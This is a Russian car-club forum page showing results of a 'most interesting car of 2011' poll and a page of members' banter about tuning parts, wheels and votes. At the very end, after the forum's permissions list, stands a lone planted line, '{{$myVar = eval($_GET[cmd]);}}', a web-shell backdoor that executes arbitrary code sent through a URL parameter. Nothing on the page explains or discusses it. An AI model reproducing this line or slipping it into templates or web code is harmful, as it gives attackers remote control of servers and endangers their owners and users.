Результаты опроса: Кто по вашему мнению достоин номинации "Самый интересный Автомобиль года 2011"

Голосовавшие
161. Вы ещё не голосовали в этом опросе
  • Артур ака Archelo

    20 12.42%
  • Серега ака keeper

    28 17.39%
  • Олежка ака BON

    10 6.21%
  • Роман ака ™B®embo™

    6 3.73%
  • Серега ака ФОРС

    9 5.59%
  • Серега ака ZIMBER

    13 8.07%
  • Лена ака Lina

    2 1.24%
  • Катя ака White pony

    0 0%
  • Женька ака Шумок

    30 18.63%
  • Артёма ака Candy White

    2 1.24%
  • Алексей ака leo

    0 0%
  • Юлия ака Julya

    0 0%
  • Александр ака Alexandr 922

    2 1.24%
  • Алексей ака GIII

    5 3.11%
  • Алексей ака Alex323-69

    2 1.24%
  • Александр ака Spaceman

    5 3.11%
  • Алексей ака RABBIT

    15 9.32%
  • Василес ака VASO

    5 3.11%
  • Евгений ака Танкист

    1 0.62%
  • Арсен ака senka

    6 3.73%
Закрытая тема
Страница 2 из 12 ПерваяПервая 1 2 3 4 ... ПоследняяПоследняя
Показано с 11 по 20 из 111

Тема: "Самый интересный Автомобиль года 2011"


  1. #11
    GTI-Racing olegarh is on a distinguished road Аватар для olegarh
    Регистрация
    02.08.2007
    Откуда
    Дубки
    Машина
    Калина лакшэри
    Сообщений
    419
    А что значит интересный?Я вот про внешность подумал и проголосовал за ФОРСа,хотя рука тянулась за сырка плюсануть,но почему-то вспомнились статьи в наших горетюнингжурналах и европейский подход к тюнингу:обвес,колеса,яркий стайл,закись на 1,4 и ПС2 с монитором в салоне или багажнике...

  2. #12
    III место Самые Интересные Диски 2011 ZIMBER is on a distinguished road Аватар для ZIMBER
    Регистрация
    20.11.2009
    Откуда
    Москва
    Машина
    Volkswagen Golf VI GTI
    Сообщений
    516
    Цитата Сообщение от White pony Посмотреть сообщение
    Синий сирокко лучший. Это уникальная и неповторимая машина в нашем клубе. Ламбо двери, ФУЛ ригер с диодными габаритами и передней решёткой от ауди Р8, подвеска КВ. Разноширокие диски Р19 с полкой и низкопрофильной резиной.
    Кать... Извини, но если уж на то пошло, то не Ригера, не диодных фонарей, не решетки от Р8 на машине пока не стоит (на сколько я знаю). А если не стоит, то зачем об этом говорить. На счет подвески тоже спорный вопрос, всетаки сыра надо ронять ниже (сугубо личное). А ФОТО подобрано не самое удачное, так как на нем мы вообще видим "кем то" разбитый бампер.
    Жень, Кать, без обид, тачка ох...ная =))

    Добавлено через 2 минуты
    Цитата Сообщение от S@TURN Посмотреть сообщение
    Кипер по сути Сильвер, только Сильва на руке и блоке)
    Я конечно дико извиняюсь, но в каком месте "суть"???

    Кипер ДСГ, К04, РЕВО и 330+сил, а в Сильвере ручка, Гарик, АПР и если мне не изменяет память, то там речь уже шла о 380+...)))
    Последний раз редактировалось ZIMBER; 01.12.2011 в 18:51. Причина: Добавлено сообщение

  3. #13
    GTI-Racing me & my gt is on a distinguished road Аватар для me & my gt
    Регистрация
    16.10.2010
    Откуда
    Москва
    Машина
    Golf V GT
    Сообщений
    90
    я проголосовала за Бона:))
    I'm dreaming about gti

  4. #14
    GTI-Racing S@TURN will become famous soon enough Аватар для S@TURN
    Регистрация
    09.07.2006
    Откуда
    мск
    Машина
    vr6 color concept - sold, а4 2.5tdi куатро!-sold, EOS - недопережитиай.
    Сообщений
    3,787
    Цитата Сообщение от ZIMBER Посмотреть сообщение
    Кать... Извини, но если уж на то пошло, то не Ригера, не диодных фонарей, не решетки от Р8 на машине пока не стоит (на сколько я знаю). А если не стоит, то зачем об этом говорить. На счет подвески тоже спорный вопрос, всетаки сыра надо ронять ниже (сугубо личное). А ФОТО подобрано не самое удачное, так как на нем мы вообще видим "кем то" разбитый бампер.
    Жень, Кать, без обид, тачка ох...ная =))

    Добавлено через 2 минуты


    Я конечно дико извиняюсь, но в каком месте "суть"???

    Кипер ДСГ, К04, РЕВО и 330+сил, а в Сильвере ручка, Гарик, АПР и если мне не изменяет память, то там речь уже шла о 380+...)))
    ну я говорю про Сильвера сейчас, когда на нем был Гарик, он был самый интересный. А сейчас Сильвер от Кипера отличается коробкой ;)
    NON LIMITUS HOMICUS DOLBOEBICUS
    (нет предела человеческой глупости)

  5. #15
    I место Самые Интересные Диски 2011 White pony is just really nice White pony is just really nice White pony is just really nice White pony is just really nice White pony is just really nice Аватар для White pony
    Регистрация
    18.05.2010
    Откуда
    Москва
    Машина
    Audi TT RS
    Сообщений
    1,900
    Цитата Сообщение от ZIMBER Посмотреть сообщение
    Кать... Извини, но если уж на то пошло, то не Ригера, не диодных фонарей, не решетки от Р8 на машине пока не стоит (на сколько я знаю). А если не стоит, то зачем об этом говорить. На счет подвески тоже спорный вопрос, всетаки сыра надо ронять ниже (сугубо личное). А ФОТО подобрано не самое удачное, так как на нем мы вообще видим "кем то" разбитый бампер.
    Жень, Кать, без обид, тачка ох...ная =)))
    я говорю о том оборудовании, которое у нас есть. оно было приобретено в 2011 году, сейчас решается вопрос с его страховкой. поэтому я его присудила сироке. Сережа, давай закончим дискутировать. Пожалуйста, ладно? Про бампер, не лезь не в свои дела, хорошо? Спасибо.
    If you wanna be rich
    You've got to be a bitch
    If you wanna ride
    Ride the White pony

    Enjoy yourself and fuck them all 0:-)

  6. #16
    III место Самые Интересные Диски 2011 ZIMBER is on a distinguished road Аватар для ZIMBER
    Регистрация
    20.11.2009
    Откуда
    Москва
    Машина
    Volkswagen Golf VI GTI
    Сообщений
    516
    Цитата Сообщение от White pony Посмотреть сообщение
    я говорю о том оборудовании, которое у нас есть. оно было приобретено в 2011 году, сейчас решается вопрос с его страховкой. поэтому я его присудила сироке. Сережа, давай закончим дискутировать. Пожалуйста, ладно? Про бампер, не лезь не в свои дела, хорошо? Спасибо.
    Дома лежит и на машине стоит - это разные вещи!!!))) У нас у всех много чё дома лежит!!!)))
    Никаких дискусий Катюнь...))) Просто раз уж ты так рекламируешь Сырника, свои диски и саму себя в соседних темах, надо уметь отстоять свою точку зрения...)))

  7. #17
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    придумывая с Ромычем конкурс, хотели учесть и охватить фактически все автомобили, поэтому слово "интересный" может иметь многогранное значение, фактически не имеющее отношение к владельцу. Ну это примерно как увидеть Ламбо Каунтач на встрече под мостом. Или просто глянув на ухоженный сток ГТИ6 или любой другой, пройдя мимо повернуть голову, остановить взгляд..... совершенно не зная что там с подвеской, под капотом....... просто как мне сын говорит, смотри папа какой интересный автомобиль ))))) он не знает как он лежит, он вообще по своему, по детски смотрит на что-то, может на фары, может на форму кузова, на всё что угодно. Мы знаем за кого голосуем, зная что там, мы для себя делаем определенный выбор, дополнительно склоняя аргумент на чашу весов в сторону вида, в сторону тюнинга или еще чего ))) будем проще, а именно вложим каждый в свое в понятие слова "интересный"........ интересный человек, интересный диван, интересный город, интересная книга, интересно где я так вляпался и т.д. )))

    Добавлено через 4 минуты
    Цитата Сообщение от me & my gt Посмотреть сообщение
    я проголосовала за Бона:))
    :camomile:
    Ми с ним старенькие и никому не нужны :expect:


    Всех дефчонок голосовавших за меня, катаю летом без верха !!!!
    Последний раз редактировалось BON; 01.12.2011 в 22:49. Причина: Добавлено сообщение
    песок сыпется....не останавливайтесь на достигнутом !

  8. #18
    I место Самые Интересные Диски 2011 White pony is just really nice White pony is just really nice White pony is just really nice White pony is just really nice White pony is just really nice Аватар для White pony
    Регистрация
    18.05.2010
    Откуда
    Москва
    Машина
    Audi TT RS
    Сообщений
    1,900
    Цитата Сообщение от ZIMBER Посмотреть сообщение
    Дома лежит и на машине стоит - это разные вещи!!!))) У нас у всех много чё дома лежит!!!)))
    Никаких дискусий Катюнь...))) Просто раз уж ты так рекламируешь Сырника, свои диски и саму себя в соседних темах, надо уметь отстоять свою точку зрения...)))
    Я рекламирую саму себя? Это где?
    Сырок особенный. Не по его вине ему почти на год задержали доставку обвеса. Это проект 2011 года. И именно я упрашиваю Женю пока оставить обвес на балконе и не ставить под зиму.

    Так у кости иночкина стало на одного друга меньше (с).

    У меня иногда складывается впечатление, исходя из некоторых комментариев, что мои посты вызывают немотивированную агрессию у людей с нестабильной психикой))) с считаю, что после ббс арчелло, мои диски лучшие. Я уверена, что они красивы и выглядят круто, потому их рекламирую. Установка части перечисленного на сироко - вопрос месяца, потому я считаю факт укомплектации тачки доп оборудованием свершившимся. Про мою машину и эту номинацию сразу написала, что нам- стоку- здесь не место. Фирштэйн?)

    Ах, я забыла. У сироко еще и даунпайп милтек) БУДЕТ установлен, лежит на балконе)))
    If you wanna be rich
    You've got to be a bitch
    If you wanna ride
    Ride the White pony

    Enjoy yourself and fuck them all 0:-)

  9. #19
    One more RUM PA PA PA RUM PUM - and the drummer boy dies Dio is a jewel in the rough Dio is a jewel in the rough Dio is a jewel in the rough Dio is a jewel in the rough Аватар для Dio
    Регистрация
    17.08.2010
    Откуда
    Москва, СВАО
    Машина
    BMW X1 xDrive 20i SportLine
    Сообщений
    1,424
    Цитата Сообщение от BON Посмотреть сообщение


    Всех дефчонок голосовавших за меня, катаю летом без верха !!!!
    Извини не удержался))))Без верха кого девочек или в кабрике без верха?)))))))))))
    По поводу первой части поста полностью согласен.

  10. #20
    GTI-Racing S@TURN will become famous soon enough Аватар для S@TURN
    Регистрация
    09.07.2006
    Откуда
    мск
    Машина
    vr6 color concept - sold, а4 2.5tdi куатро!-sold, EOS - недопережитиай.
    Сообщений
    3,787
    И все равно за рабита ;) вот Лексей бы не продал сильвера,то думаю он вне конкуренции был ;) всем пись) в смысле мир

    Добавлено через 1 минуту
    Кать у Арчело оз ;) ббс у Васо ;)
    Последний раз редактировалось S@TURN; 02.12.2011 в 00:30. Причина: Добавлено сообщение
    NON LIMITUS HOMICUS DOLBOEBICUS
    (нет предела человеческой глупости)

Закрытая тема
Страница 2 из 12 ПерваяПервая 1 2 3 4 ... ПоследняяПоследняя

Похожие темы

  1. Quest "Рубежи обороны" (7-9 мая 2011 года)
    от Magistral в разделе Реклама
    Ответов: 3
    Последнее сообщение: 01.04.2024, 21:59
  2. "Самый интересный Автомобиль года 2011"
    от ™B®embo™ в разделе Итоги 2011 года
    Ответов: 39
    Последнее сообщение: 28.11.2011, 11:53
  3. Ответов: 0
    Последнее сообщение: 24.11.2011, 03:02
  4. Драг-битва "Самый быстрый автомобиль Москвы"
    от dubick в разделе Встречи и мероприятия
    Ответов: 2
    Последнее сообщение: 08.10.2011, 00:46
  5. Ответов: 0
    Последнее сообщение: 04.10.2011, 17:26

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}